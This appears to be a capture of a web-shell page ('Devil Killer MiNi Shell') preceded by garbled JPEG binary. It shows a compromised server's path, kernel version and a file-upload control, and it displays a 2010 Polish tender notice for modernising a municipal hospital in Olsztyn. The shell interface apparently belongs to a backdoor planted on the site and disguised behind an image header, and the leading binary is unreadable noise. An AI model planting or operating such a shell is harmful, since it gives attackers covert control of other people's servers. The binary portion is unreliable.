JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100913/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100913/250009-N-2010.html

<p class="kh_header"><b>Olsztyn: modernizacja Obiektów  Miejskiego Szpitala Zespolonego przy ul. Wojska Polskiego 30 w Olsztynie</b><br>
<b>Numer ogłoszenia: 250009 - 2010; data zamieszczenia: 13.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Szpital Zespolony , ul. Niepodległości 44, 10-045 Olsztyn, woj. warmińsko-mazurskie, tel. (089) 532 6349, faks (089) 5326349.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.olsztyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> modernizacja Obiektów  Miejskiego Szpitala Zespolonego przy ul. Wojska Polskiego 30 w Olsztynie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie modernizacji obiektu Miejskiego Szpitala Zespolonego  w Olsztynie przy ul. Wojska  Polskiego 30. Budynek składa się ze skrzydła wschodniego i zachodniego scalonego łącznikiem.

SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA - architektura/ konstrukcja
Inwestycja realizowana dwuetapowo, tj
w pierwszym etapie realizowana  będzie  przebudowa w obrębie obrysu budynku bez zmian  w zagospodarowaniu terenu i zmian w sposobie użytkowania obiektu.
Elementy wykraczające  poza obrys budynku realizowane będą w ramach etapu drugiego według odrębnego opracowania.
Modernizacja polega na nowej aranżacji pomieszczeń, zmianie ich układu funkcjonalnego, poszerzenia otworów drzwiowych w ścianach, stworzeniu nowych węzłów sanitarnych, zmianie układu ścian działowych oraz robotach wykończeniowych.
Zakres prac obejmuje również wymianę istniejącej stolarki okiennej i drzwiowej, wykonanie izolacji przeciwwilgociowych ścian i podłóg piwnic, docieplenie ścian zewnętrznych i stropu nad drugim piętrem oraz modernizację istniejących instalacji.
         Przewiduje się - dobudowę -  trzech klatek schodowych,
                                 - rozbudowę  - zadaszenia nad podjazdem,
                                 - przebudowę - części dróg wewnętrznych,
                                                        - rozbiórki schodów  terenowych do   piwnic(dawnej 						kotłowni),
                                                        - schodów zewnętrznych w rejonie rampy rozładunkowej,
                                                        - przełożenia odcinków sieci wewnętrznych sanitarnych                                  i elektrycznych.
Wyżej wymieniony zakres przebudowy i rozbudowy stanowić będzie II etap realizacji prac inwestycyjnych w obiekcie.
Istniejący stan techniczny: 
Budynek główny stanowi część zespołu szpitala i usytuowany jest w Olsztynie przy ul. Wojska Polskiego 30.
Budynek powstał w pierwszej połowie XX wieku, posiada częściowe podpiwniczenie, 3 kondygnacje zwieńczone dachem o konstrukcji drewnianej. Poddasze jest częściowo użytkowe. Układ ścian nośnych podłużny.
Elementy konstrukcyjne:
- Fundament - ławy fundamentowe monolityczne, betonowe.
- Ściany fundamentowe - murowane z cegły ceramicznej.
- Ściany zewnętrzne - cegła ceramiczna .
- Ściany wewnętrzne nośne cegła pełna.
- Stropy Klejna, lokalnie żelbetowe monolityczne nad częścią piwnic..
- Dach dwuspadowy , więźba dachowa drewniana , deskowanie kryte blacha trapezową.

Układ funkcjonalny:
Budynek składa się ze skrzydła wschodniego i zachodniego połączonych łącznikiem wewnętrznym. Główne wejście do budynku znajduje się w skrzydle zachodnim.
Komunikację pionową zapewniają dwie klatki schodowe umiejscowione na stykach łącznika wewnętrznego ze skrzydłami wschodnim i zachodnim prowadzące na poszczególne piętra i oddziały.
Zaleca się bezwarunkowo przed przystąpieniem do wszelkich prac niniejszego zadania, wykonanie udrożnienia istniejącego lub wykonanie nowego drenażu opaskowego wokół budynku. 
Stan techniczny budynku dobry, występują lokalne uszkodzenia tynków, gzymsów, opierzeń, i rur spustowych, obmurowań studzienek doświetlających piwnice, pokrycia dachowego, łuszczenie farby na ścianach zewnętrznych i wewnętrznych, zawilgocenie większości ścian w piwnicach i związane z tym zagrzybienie. Stwierdzono niedrożność istniejącego systemu odwodnienia budynku  i drenażu wokół niego.
Szczegółowy opis stanu istniejącego podano w Ekspertyzie Technicznej stanowiącej integralną część Projektu Budowlanego.

Projektowane rozwiązania funkcjonalno-przestrzenne:
-	 Układ konstrukcyjny pozostaje nienaruszony. Wyburzenia dotyczą ścian działowych o drugorzędnym znaczeniu konstrukcyjnym.
-	 Główny układ funkcjonalny budynku pozostaje zachowany. Projektuje się nowy układ pomieszczeń dostosowany do nowego programu technologicznego oraz obowiązujących norm i przepisów.
-	Zmianie ulega układ ścian działowych, poszerzone zostają niektóre otwory drzwiowe w ścianach.
-	Projektowane są nowe węzły sanitarne oraz obudowa przeciwpożarowa istniejących klatek schodowych. 
-	Projektowane są nowe pomieszczenia techniczne na części powierzchni poddasza.
-	Projektowane jest obniżenie części posadzek w piwnicach z zachowaniem istniejącego poziomu posadowienia..
-	Projektuje się także nowe posadzki na gruncie na parterze w skrzydle wschodnim, w rejonie starej kotłowni po zasypaniu istniejących pomieszczeń w piwnicy, z pozostawieniem przełazowych kanałów technicznych dla instalacji.
-	Główne wejście do budynku pozostaje w tym samym miejscu, przesunięte zostaje wejście do Izby Przyjęć w rejonie podjazdu dla karetek pogotowia.

Ważniejsze parametry techniczne budynku:
                    Powierzchnia zabudowy według  inwentaryzacji - 2887 m2.
                    Powierzchnia użytkowa łącznie ze strychem po modernizacji - 5733,13 m2

Opis zakresu prac budowlanych.
Ściany:
Ścianki działowe - uzupełnienia ścianek istniejących oraz nowe wykonać o gr. 12cm z gazobetonu o gr. 6 cm z cegły dziurawki na zaprawie cementowo-wapiennej.
Stolarka okienna i drzwiowa:
Istniejącą stolarkę okienną należy wymienić na nową zachowując pierwotną formę architektoniczną, tj; ślemiona i szprosy, słupki pomiędzy poszczególnymi skrzydłami okien z zastosowaniem nawiewników szczelinowych okiennych - regulowanych.
Projektowane drzwi ewakuacyjne o wymiarach 140 x 200 w świetle ościeżnicy, do realizacji w II etapie inwestycji.
Stolarka wewnętrzna:
Zgodnie z wytycznymi technologicznymi obowiązującymi dla pomieszczeń w obiektach szpitalnych, np. odpowiednie dla sal łóżkowych, a także do pomieszczeń, do których może być wtaczane łóżko.
Podłogi i posadzki:
     W zależności od przeznaczenia pomieszczeń przewiduje się następujące rodzaje podłóg:
a/- podłogi trwałe, gładkie, ciepłe, łatwo zmywalne / typu Tarket lub PCV /. 
b/- podłogi trwałe, gładkie, łatwo zmywalne, odporne na wilgoć i środki dezynfekcyjne / typu płytki terakotowe/ - stosowane w pomieszczeniach o charakterze zabiegowym.
c/- podłogi cementowe - / typu lastrico szlifowane / stosowane w pomieszczeniach technicznych ( wentylatorownia,  hydrofornia, kotłownia, magazyny itp ).

Wykończenie ścian wewnętrznych
Na ścianach i sufitach przewiduje się tynki kat. 4. filcowane, natomiast w pomieszczeniach gospodarczych, magazynowych, technicznych kat. 3.
Ściany wszystkich pomieszczeń /z wyjątkiem administracyjnych/powinny być łatwo zmywalne i umożliwiające dezynfekcję.
Ściany pomieszczeń sanitarnych, kuchenek i zmywalni oraz gabinetów zabiegowych wykończyć glazurą do wysokości 2m.
Ściany przy umywalkach - fartuch ochronny z płytek ceramicznych do wys. 1.6 m. i szerokości minimum 0,6 m.
Ściany w brudownikach - płytki do wysokości całej kondygnacji, sufity pomalować farbą zmywalną.
Malowanie wewnętrzne ścian i sufitów:
Do pokrycia ścian należy stosować materiały umożliwiające łatwe czyszczenie powierzchni i nieszkodliwe dla ludzkiego organizmu w kolorach neutralnych o pastelowych odcieniach.
Materiały muszą posiadać atesty PZH.
Izolacje termiczne ścian zewnętrznych /samo gasnący polistyren spieniony gr 14cm/, cokołów ścian piwnic; / styrodurem XPS-30  GR. 10 cm./stropodachu / wełna mineralna-60, gr. 10Cm,  podłóg na gruncie  - styrodur  XPS - 30, - gr.10 cm, stropy nad piwnicami nieogrzewanymi wełna  mineralna ; 60. Gr. 5cm.
Izolacje przeciwwilgociowe poziome i pionowe:
Należy odkopać budynek do poziomu góry ław fundamentowych, sprawdzić stan izolacji pionowej.
Po stwierdzeniu poziomu faktycznego zalegania wody gruntowej należy dokonać osuszenia murów.  Przed wykonaniem izolacji sprawdzić wilgotność podłoża.
Gdyby po wykonaniu drenażu i izolacji pionowych występowały nadal wysięki wody do piwnicy należy rozważyć zastosowanie iniekcji z podcięciem odcinkowym murów i wykonanie drenaży pod posadzkowego z wyprowadzeniem wody na zewnątrz obiektu.
Tynki zewnętrzne - to systemowe tynki mineralne, typu baranek, cienkowarstwowe na siatce.
Malowanie zewnętrzne - farbami silikatowymi, systemowymi w kolorze wg. palety.
Opaska wokół budynku- wykonać ze żwiru rzecznego frakcji 3 - 6 cm na geowłókninie czarnej x 2 i podsypce piaskowej.
Opierzenia i obróbki blacharskie  - po usunięciu istniejących wykonać na nowo z blachy tytan ocynk.
Kominy -  zaleca się bezwzględne rozebranie wszystkich i ponowne wymurowanie, zamiennie można wykonać wywietrzaki dachowe rurowe w izolacji.
Stary komin, nieużywanej kotłowni powinien być pilnie rozebrany w swojej części wyniesionej poddasza, gdyż grozi zawaleniem i katastrofą budowlaną.
II Etap:
obejmuje: budowę 3 klatek schodowych ewakuacyjnych w technologii tradycyjnej, rozbudowę zadaszenia nad podjazdem, przebudowę części dróg wewnętrznych, rozbiórkę części schodów terenowych  prowadzących do starej kotłowni w piwnicy, przebudowę schodów w rejonie rampy rozładunkowej, przełożenie odcinków sieci wewnętrznych i sanitarnych.

SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA - branża elektryczna
W zakres przebudowy i modernizacji obiektów szpitala wchodzi wymiana następujących instalacji elektrycznych:
	instalacja oświetlenia ogólnego wnętrz
	instalacja gniazd wtykowych
	instalacja zasilania central wentylacyjnych
	instalacja oświetlenia awaryjnego
	instalacja kontroli stanu opraw oświetlenia awaryjnego
	instalacja oddymiania klatek schodowych
	instalacja sterowania oświetleniem
	instalacje odbiorcze niskoprądowe
	instalacja połączeń wyrównawczych
	instalacja uziemiająca
	instalacja odgromowa
	instalacja oświetlenia terenu
	instalacja kontroli stanu instalacji IT
	instalacja kontroli stanu izolacji
	instalacja opraw bakteriobójczych
	instalacja przyzywowa (w panelu przyłóżkowym)
	instalacja LAN
	instalacja SAP
	instalacja DSO
	instalacja telefoniczna
	instalacja interkom CNC
	instalacja interkom wewnątrz oddziałowa
	instalacja TVSat
Modernizacja  będzie przebiegała przy czynnym obiekcie. Demontaże istniejących instalacji nastąpią dopiero po położeniu nowych i będą przeprowadzane etapowo.
Wymianę agregatu prądotwórczego należy wykonać przy zabezpieczeniu obiektu szpitala w zasilanie rezerwowe (oddziały szpitalne). Część prac w rozdzielni elektrycznej będzie musiała być wykonywana pod napięciem.
Wszystkie materiały, urządzenia i elementy instalacji stosowane na budowie powinny odpowiadać Polskim Normom i odnośnym przepisom ich stosowania w budownictwie, tzn.  posiadać polskie certyfikaty, atesty i świadectwa dopuszczenia ITB, PZH, oraz innych wymaganych instytucji. 
Roboty należy wykonać zgodnie z dokumentacją techniczną. Jakiekolwiek odstępstwo od dokumentacji i zmiany wynikające w trakcie wykonawstwa, wymagają zgody i zatwierdzenia Inspektora nadzoru w konsultacji z Biurem Projektów.

SZCZWEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA - branża instalacji sanitarnych                                                    
1. Zakres prac obejmuje:
a/.wymianę instalacji gazów medycznych, polegającą na wykonaniu nowej instalacji tlenu medycznego, próżni, sprężonego powietrza, podtlenku azotu oraz odciągu gazów anestezjologicznych oraz zdemontowaniu starej instalacji po uruchomieniu nowej;
b/.montaż wentylacji mechanicznej i grawitacyjnej, instalacji oddymiania klatek schodowych, klimatyzacji oraz instalacji chłodniczej oraz demontaż starej wentylacji;
c/.montaż instalacji wody zimnej, instalacji wody ppoż., instalacji ciepłej wody i cyrkulacji, instalacji kanalizacji sanitarnej z przepompownią ścieków, instalacji kanalizacji deszczowej oraz demontaż starej instalacji wod.kan.;
d/.instalacji centralnego ogrzewania i ciepła technologicznego oraz demontaż starej instalacji c.o.
2. Zakres robót zawiera dokumentacja techniczna, która jest załącznikiem do SIWZ.
3. Zamawiający dopuszcza składanie ofert z zastosowaniem materiałów i urządzeń  równoważnych, spełniających warunki i parametry techniczne zgodne z polską normą i posiadające aprobatę techniczną. 
Wymagania szczegółowe kolejności wykonywania prac:
- pierwszej kolejności należy wykonać fundamenty i piwnice budynku ze wszystkimi instalacjami.
-	Po wykonaniu piwnic możliwe będzie wykonanie części wschodniej i łącznika, części zachodniej w drugiej kolejności. Remontowane pomieszczenia parteru należy przekazać wykończone w całości celem przekazania użytkownikowi,
-	Po przekazaniu parteru Szpital udostępni pierwsze piętro skrzydła wschodniego. Jednocześnie możliwe będzie prowadzenie prac na strychu wraz z montażem central klimatyzacyjnych.
-	Po przekazaniu I piętra możliwe będzie wejście na II piętro.
-	W zakres robót w części przeznaczonej na Niepubliczny Zakład Opieki Zdrowotnej wchodzą roboty tylko instalacyjne ( wymiana instalacji wod-kan, c.o. cw.).
-	I elektryczne - gniazda wtykowe i instalacja oświetlenia, telekomunikacyjna.
-	Wydzielone do remontu powierzchnie należy szczelnie odizolować od powierzchni użytkowanych (kurz i pyły).
-	Demontaż instalacji dokonać należy tylko w zakresie koniecznym do przeprowadzenia nowych instalacji.
-	Demontaże poziomów wszystkich instalacji przebiegających w piwnicach i kanałach należy dokonać w całości.
-	Modernizację węzła ciepłowniczego należy wykonać w okresie letnim.       
Nadzór autorki nad inwestycją sprawuje Termoprojekt Sp. z o.o., ul. Unii Lubelskiej 3, 61-249 Poznań. Modernizacja obiektów MSZ w Olsztynie przy ul. Wojska Polskiego 30  powinna być wykonana zgodnie z dokumentacją przetargową..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w Art. 67 ust. 1 pkt. 6 ustawy polegających na powtórzeniu tego samego rodzaju zamówień ujętych w niniejszym postępowaniu.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2, 45.26.51.40-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wadium w wysokości: 300 000 zł (słownie: trzysta tysięcy) złotych należy wnieść przed upływem terminu składania ofert, określonym w specyfikacji.

2.	 Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy:
Bank: Nordea Bank Polska  S.A.
Konto: 08144012280000000001890786 z dopiskiem: wadium w sprawie 
DZZ-382-44/10
Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.
Nie dopuszcza się wpłaty wadium w kasie Miejskiego Szpitala Zespolonego 
w Olsztynie.
3.	Wadium wniesione w innej formie niż forma pieniężna (zgodnie  z przepisami ustawy Prawo zamówień publicznych) winno być złożone w Sekretariacie Miejskiego Szpitala Zespolonego w Olsztynie przy ul. Niepodległości 44 przed upływem terminu składania ofert określonym w SIWZ.
4.	Zamawiający dokona zwrotu wadium zgodnie z art. 46 ustawy Prawo zamówień publicznych.
5.	Zamawiający zatrzymuje wadium wraz  z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ww. ustawy, lub pełnomocnictw, chyba że udowodni, że wynika to  z przyczyn nie leżących po jego stronie.
6.	 Zamawiający zatrzymuje wadium wraz  z odsetkami, jeżeli wykonawca, którego oferta  została wybrana:
             - odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach        
              określonych w ofercie,
             - nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
             - zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
7. Wykonawca, który nie wniesie wymaganego wadium do upływu terminu składania ofert, na przedłużony okres związania ofertą lub w terminie, o którym mowa w art. 46 ust. 3 ustawy Prawo zamówień publicznych albo nie zgodzi się na przedłużenie okresu związania ofertą zostanie wykluczony z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 ust. 2 pkt. 2 ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z art. 22 ust. 1 ustawy o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy udokumentują należyte wykonanie dwóch robót budowlanych, w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, spełniających następujące warunki:
(1) jedna robota budowlana o wartości nie mniejszej niż 8.000.000 (osiem milionów) złotych brutto,
(2) druga robota budowlana o wartości nie mniejszej niż 2.000.000 (dwa miliony) złotych brutto, która została zrealizowana w odniesieniu do czynnego obiektu szpitalnego,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z art. 22 ust. 1 ustawy o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują osobami zdolnymi do wykonania zamówienia, to jest:
3.1.	udokumentują, że osoba, która będzie pełnić funkcję kierownika budowy posiada uprawnienia budowlane, uzyskane w jednej z następujących postaci:
-	 uprawnienia budowlane w specjalności konstrukcyjno - budowlanej bez ograniczeń, uzyskane zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane,
-	 uprawnienia budowlane wydane na podstawie ustawy z dnia 24 października 1974 r. Prawo budowlane (jednolity tekst: Dz. U. z 1981 r., Nr 38, poz. 229 ze zm.) lub ustawy z dnia 31 stycznia 1961 r. Prawo budowlane (Dz. U. z 1965 r. Nr 7, poz. 46 ze zm.) odpowiadające swym zakresem uprawnieniom budowlanym w specjalności konstrukcyjno - budowlanej bez ograniczeń wydawanym zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane
3.2. udokumentowania, że osoby, które będą pełnić funkcję kierowników poszczególnych rodzajów robót posiadają:
     a) uprawnienia budowlane, uzyskane w jednej z następujących postaci:
-	 uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń, uzyskane zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane,
-	 uprawnienia budowlane wydane na podstawie ustawy z dnia 24 października 1974 r. Prawo budowlane (jednolity tekst: Dz. U. z 1981r., Nr 38, poz. 229 ze zm.) lub ustawy z dnia 31 stycznia 1961 r. Prawo budowlane (Dz. U. z 1965 r. Nr 7, poz. 46 ze zm.) odpowiadające swym zakresem uprawnieniom budowlanym 
w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych 
i kanalizacyjnych bez ograniczeń, wydawanym zgodnie 
z przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane,
b)	uprawnienia budowlane, uzyskane w jednej z następujących postaci:
-	 uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych oraz elektro-energetycznych bez ograniczeń, uzyskane zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane,
-	 uprawnienia budowlane wydane na podstawie ustawy z dnia 24 października 1974 r. Prawo budowlane (jednolity tekst: Dz. U. z 1981r., Nr 38, poz. 229 ze zm.) lub ustawy z dnia 31 stycznia 1961 r. Prawo budowlane (Dz. U. z 1965 r. Nr 7, poz. 46 ze zm.) odpowiadające swym zakresem uprawnieniom budowlanym w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych oraz elektroenergetycznych bez ograniczeń, wydawanym zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z art. 22 ust. 1 ustawy o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy posiadają ubezpieczenie od odpowiedzialności cywilnej, w zakresie prowadzonej działalności gospodarczej w wysokości co najmniej 5.000.000 (pięć milionów) złotych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

